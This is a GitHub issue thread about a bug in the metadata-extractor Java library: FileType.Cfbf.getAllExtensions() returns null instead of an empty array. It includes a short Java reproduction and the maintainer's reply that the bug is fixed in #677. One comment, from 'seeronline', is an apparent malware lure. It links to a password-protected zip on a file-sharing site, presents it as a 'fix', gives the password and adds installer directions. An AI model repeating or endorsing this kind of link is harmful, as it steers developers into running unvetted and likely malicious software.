### ISSUE TITLE
 FileType.Cfbf.getAllExtensions() returns null

### ISSUE THREAD

**Issue by ogawaffm** [drewnoakes/metadata-extractor#676]
The following code breaks because FileType.Cfbf.getAllExtensions() returns null instead of String[0]:

```java
    private final static List<String> supportedImageFileTypes = new ArrayList<>();

    static {
        for (FileType fileType : FileType.values()) {
            for (String extension : fileType.getAllExtensions()) {
                supportedImageFileTypes.add(extension.toLowerCase());
            }
        }
    }
```
As expected, String[0] is returned for FileType.Unknown and FileType.Riff (both of which have no associated extension).

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by drewnoakes** [comment]
Fixed in #677
